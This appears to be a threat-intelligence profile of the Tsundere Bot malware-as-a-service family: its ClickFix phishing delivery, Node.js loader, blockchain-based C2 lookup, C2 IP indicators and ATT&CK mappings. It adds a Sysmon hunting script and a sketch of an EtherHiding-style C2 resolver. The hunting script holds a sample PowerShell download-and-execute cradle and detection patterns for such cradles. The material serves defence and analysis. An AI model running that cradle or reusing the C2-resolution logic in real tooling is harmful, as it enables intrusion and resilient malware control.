Tsundere Bot
Tsundere Bot is a malware-as-a-service (MaaS) platform with backdoor and loader capabilities, observed in campaigns attributed to the initial access broker TA584 (tracked by Proofpoint since 2020) and first delivered by TA584 in late November 2025. It has been used alongside the XWorm remote access trojan to obtain network access assessed as potentially enabling follow-on ransomware activity.
Delivery/infection chain (as reported): TA584 uses email-led phishing from compromised aged accounts (including via SendGrid and Amazon SES) with per-target unique URLs, geofencing and IP filtering, and redirect chains via traffic direction systems (e.g., Keitaro). Victims who pass filtering are presented with CAPTCHA and “ClickFix” social-engineering pages that instruct them to run a PowerShell command. The PowerShell retrieves and executes an obfuscated script that loads Tsundere Bot (or XWorm) into memory.
Execution/architecture and capabilities: Tsundere Bot requires Node.js; installers generated from its C2 panel can add Node.js to victim systems. The reported chain decrypts two AES-encrypted Node.js files embedded in the payload, and a loader then executes the Tsundere Bot component. Reported functionality includes collecting system information/profiling, executing arbitrary code (including arbitrary JavaScript received from C2), using infected hosts as SOCKS proxies, and installing additional payloads. It also includes a locale check and aborts execution on systems using Commonwealth of Independent States (CIS) languages.
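The delivery and execution chain above (interactive PowerShell cradle, then Node.js running a decrypted loader) is what an endpoint hunt can key on. The following is an added example, not Proofpoint's, Mallory's or the malware's code: it scores constructed Sysmon Event ID 1-style process-creation events for the ClickFix-to-PowerShell-to-node.exe pattern. The sample events, the "expected Node.js install directory" list and the assumption that a command pasted into the Run dialog or a console shows explorer.exe (or a terminal) as the parent are all assumptions to tune for your estate.

```python
"""Hunt for the ClickFix -> PowerShell -> Node.js chain in process-creation events.

Added example (not the report's or the product's code). Field names follow
Sysmon Event ID 1 (Image, ParentImage, CommandLine); the events are constructed.
"""
import re

# Constructed sample events, not real telemetry. Hostname/path details are invented.
SAMPLE_EVENTS = [
    {   # ClickFix victim pastes a cradle into Win+R: explorer.exe is the parent
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iex (iwr -UseBasicParsing http://example.invalid/verify)"',
    },
    {   # Node.js dropped under the user profile and launched by PowerShell (assumed path)
        "Image": r"C:\Users\alice\AppData\Roaming\nodejs\node.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Users\alice\AppData\Roaming\nodejs\node.exe" C:\Users\alice\AppData\Roaming\tb\loader.js',
    },
    {   # Benign developer use of a system-wide Node.js install
        "Image": r"C:\Program Files\nodejs\node.exe",
        "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "CommandLine": r'"C:\Program Files\nodejs\node.exe" build.js',
    },
    {   # Benign scheduled PowerShell script run from a service host
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1",
    },
]

# Tokens typical of a download-and-execute cradle (obfuscated script fetched, then run).
CRADLE_TOKENS = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b"
    r"|frombase64string|-enc(odedcommand)?\b|\s-e\s|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.IGNORECASE)
NODE = re.compile(r"\\node\.exe$", re.IGNORECASE)
# Parents that indicate a user typed/pasted the command (assumption: Run dialog -> explorer.exe).
USER_LAUNCHERS = re.compile(r"\\(explorer|cmd|conhost|WindowsTerminal|OpenConsole)\.exe$", re.IGNORECASE)
SCRIPT_HOSTS = re.compile(r"\\(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe$", re.IGNORECASE)
# Where a legitimately installed node.exe is expected to live (assumption; extend for nvm etc.).
EXPECTED_NODE_DIRS = ("c:\\program files\\nodejs\\", "c:\\program files (x86)\\nodejs\\")


def score_event(ev):
    """Return the list of reasons an event looks like the chain; empty means clean."""
    reasons = []
    image, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]
    if POWERSHELL.search(image) and USER_LAUNCHERS.search(parent) and CRADLE_TOKENS.search(cmd):
        reasons.append("powershell download-and-execute cradle launched interactively (ClickFix pattern)")
    if NODE.search(image):
        if not image.lower().startswith(EXPECTED_NODE_DIRS):
            reasons.append("node.exe running outside expected install directory")
        if SCRIPT_HOSTS.search(parent):
            reasons.append("node.exe spawned by a script host")
    return reasons


def hunt(events):
    """Return (index, reasons) for every event that triggered at least one rule."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
```

Correlating the two hits by user and time window (cradle first, node.exe within minutes) is what turns these per-event rules into a chain detection; the PowerShell rule on its own will also fire on other ClickFix families, which is acceptable since the lure page, not the payload, is the shared stage.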
C2 and evasion: Tsundere Bot retrieves its C2 address/configuration from the Ethereum blockchain using an EtherHiding-like technique (reading a Web3 smart contract through multiple public RPC providers), which complicates takedown and detection; it then communicates with the C2 over WebSockets. A hardcoded fallback C2 is reported in the installer. Reported network indicators include the C2 193.17.183.126:3001 and an additional Tsundere Bot C2 at 85.236.25.119.
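To make the EtherHiding-style lookup concrete: the bot issues a read-only `eth_call` against a contract over ordinary JSON-RPC, and the provider returns an ABI-encoded `string` that carries the C2 endpoint, so the blockchain is acting as a resilient key-value store rather than a transport. The block below is an added example, not the malware's code: the contract address, function selector, RPC responses and the `ws://` endpoint (a TEST-NET address) are all constructed placeholders, and the fallback logic only mirrors the reported "hardcoded fallback C2" behaviour in outline.

```python
"""Wire-level sketch of an EtherHiding-style C2 lookup (added example, not the bot's code).

eth_call request shape and the ABI string encoding (offset word, length word,
32-byte-padded bytes) are standard Ethereum JSON-RPC/ABI; everything else is constructed.
"""
import json

# Hypothetical contract address and 4-byte function selector (placeholders, not IOCs).
CONTRACT = "0x" + "11" * 20
SELECTOR = "0xdeadbeef"
FALLBACK_C2 = "ws://203.0.113.1:3001"   # constructed stand-in for the hardcoded fallback


def build_eth_call(contract, selector, rpc_id=1):
    """JSON-RPC body for a read-only call of a no-argument contract function."""
    return json.dumps({
        "jsonrpc": "2.0", "id": rpc_id, "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    })


def abi_encode_string(s):
    """ABI-encode a single `string` return value (used here to build test responses)."""
    data = s.encode()
    head = (32).to_bytes(32, "big")                      # offset of the dynamic data
    length = len(data).to_bytes(32, "big")
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    return "0x" + (head + length + padded).hex()


def abi_decode_string(hexdata):
    """Decode an ABI-encoded `string`, validating offsets so a malformed response cannot
    read out of bounds."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 64:
        raise ValueError("response too short for an ABI string")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset points outside payload")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length exceeds payload")
    return raw[start:start + length].decode()


# Constructed provider responses: first provider errors, second returns the endpoint.
ERROR_RESPONSE = json.dumps({"jsonrpc": "2.0", "id": 1,
                             "error": {"code": -32000, "message": "execution reverted"}})
GOOD_RESPONSE = json.dumps({"jsonrpc": "2.0", "id": 1,
                            "result": abi_encode_string("ws://203.0.113.10:3001")})


def resolve_c2(rpc_responses, fallback=FALLBACK_C2):
    """Walk the responses from several RPC providers in order; the first well-formed
    result wins, otherwise return the hardcoded fallback endpoint."""
    for resp in rpc_responses:
        body = json.loads(resp)
        if "error" in body or "result" not in body:
            continue
        try:
            return abi_decode_string(body["result"])
        except (ValueError, UnicodeDecodeError):
            continue
    return fallback


if __name__ == "__main__":
    print(build_eth_call(CONTRACT, SELECTOR))
    print(resolve_c2([ERROR_RESPONSE, GOOD_RESPONSE]))
```

The defensive takeaway is that the read is plain HTTPS to a public RPC provider, so the network hook is the RPC hostname being contacted by a process that has no business speaking Web3 (here node.exe launched from a user profile), followed shortly by an outbound WebSocket to a bare IP; blocking a single contract or provider does little, because the operator can redeploy the contract or the client can rotate providers.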
Attribution/associations: Kaspersky is cited as first documenting Tsundere Bot and attributing it to a Russian-speaking operator linked to 123 Stealer. Proofpoint assesses TA584 is likely connected to the Russian cybercriminal ecosystem/underground markets and that TA584 activity overlaps with a cluster tracked as Storm-0900.
Groups observed using it
1 distinct threat actor attributed by public researchers.
TA584 has been observed employing the Tsundere Bot in conjunction with the XWorm remote access trojan... This command loads either XWorm or Tsundere Bot into memory. Tsundere Bot, a malware-as-a-service platform, gathers system information, can execute arbitrary code, and uses the Ethereum blockchain to retrieve its command-and-control address.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 technique
Initial Access
3 techniques
"The malware targets organizations globally through carefully crafted phishing emails that impersonate trusted brands and government agencies, tricking victims into executing malicious commands."
“The currently prevalent attack chain begins with emails sent from hundreds of compromised, aged accounts… The emails include unique URLs for each target…”
“The currently prevalent attack chain begins with emails sent from hundreds of compromised, aged accounts, delivered via SendGrid and Amazon Simple Email Service (SES). The emails include unique URLs for each target…”
Execution
4 techniques
"This command loads either XWorm or Tsundere Bot into memory."
"...followed by a ClickFix page instructing them to execute a PowerShell command."
“Those who pass the filters will land on a CAPTCHA page, followed by a ClickFix page instructing the target to run a PowerShell command on their system.”
Defense Evasion
5 techniques
“The command fetches and executes an obfuscated script…”
“TA584 sends emails impersonating various organizations… Brand impersonation further reinforces this approach… localized or regionally relevant brands used to increase credibility…”
"then decrypts two AES-encrypted Node.js files embedded within the payload."
“The emails usually contain unique links for each target that performs geofencing and IP filtering. If these checks were passed, the recipient is redirected…”
"This command loads either XWorm or Tsundere Bot into memory."
Discovery
3 techniques
"Tsundere Bot... gathers system information..."
“The emails usually contain unique links for each target that performs geofencing and IP filtering. If these checks were passed, the recipient is redirected…”
“…includes logic to check the system locale, aborting execution if the system is using Commonwealth of Independent States (CIS) country languages…”
Command and Control
7 techniques
"Once installed, Tsundere Bot connects to its command-and-control server at 193.17.183.126:3001"
“It communicates with its C2 servers over WebSockets…”
“…supports using infected hosts as SOCKS proxies.”
"...uses the Ethereum blockchain to retrieve its command-and-control address."
“The command fetches and executes an obfuscated script… [and Tsundere Bot can be used] …to install additional payloads.”
“The malware retrieves its command-and-control (C2) address from the Ethereum blockchain using a variant of the EtherHiding technique…”
Recent activity
11 sources tracked across advisories, community write-ups, and news.
Newly adopted malware in TA584 campaigns used alongside XWorm to support initial access and persistence, assessed as part of activity that can lead to follow-on ransomware attacks.
A newly reported TA584-associated malware used for stealthy, persistent access. It uses Windows Registry autorun persistence with null-terminator injection to hide the Run key from common enumeration tools, executes an mshta→VBScript→hidden PowerShell chain at boot, and retrieves its payload dynamically from an external IP each startup to remain modular and largely fileless.
Malware-as-a-service backdoor/loader distributed by TA584 from late Nov 2025 alongside XWorm; uses Ethereum blockchain-based C2 discovery (via multiple RPC providers) and then WebSocket C2; requires Node.js (installer can fetch/install it); performs locale checks and exits on CIS-language locales.
Malware-as-a-service platform used for initial access; collects system information, supports arbitrary code execution, and leverages the Ethereum blockchain to obtain its C2 address.